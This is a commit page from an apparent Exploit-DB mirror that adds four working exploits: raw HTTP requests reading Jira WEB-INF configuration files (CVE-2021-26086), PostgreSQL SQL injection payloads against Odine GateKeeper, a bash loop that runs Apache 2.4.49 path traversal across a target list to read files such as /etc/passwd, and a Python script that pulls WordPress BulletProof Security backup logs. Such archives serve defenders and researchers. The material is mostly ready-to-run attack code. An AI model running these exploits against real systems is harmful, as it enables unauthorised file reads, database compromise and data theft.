bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-07

Browse source 
4 changes to exploits/shellcodes

Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
Apache HTTP Server 2.4.49 - Path Traversal
This commit is contained in:
Offensive Security 2021-10-07 05:02:12 +00:00
parent 44fc5e9b1a
commit bd08b79b4a
5 changed files with 210 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

87
exploits/multiple/webapps/50380.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086
POC File #1 - web.xml
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #2 - seraph-config.xml
GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #3 - decorators.xml
GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #4 - /jira-webapp-dist/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #5 - /jira-webapp-dist/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #6 - /atlassian-jira-webapp/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #7 - /atlassian-jira-webapp/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

42
exploits/multiple/webapps/50381.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
====================================================
# PoC : SQLi :
GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25
Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL
====================================================

18
exploits/multiple/webapps/50383.sh Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team
#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

59
exploits/php/webapps/50382.py Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <= 5.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md
'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
This affects versions up to, and including, 5.1.
'''
'''
'Banner:
'''
banner = '''
______ _______ ____ ___ ____ _ _____ ___ _________ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
\____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/
* Sensitive information disclosure
@ Author: Ron Jost
'''
print(banner)
import argparse
import requests
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
print('')
print('[*] Starting Exploit:')
print('')
paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]
# Exploit
for pathadd in paths:
x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
print(x.text)

4
files_exploits.csv
View file

@ -44492,3 +44492,7 @@ id,file,description,date,author,type,platform,port
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java, 50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php, 50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, 50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,

Can't render this file because it is too large.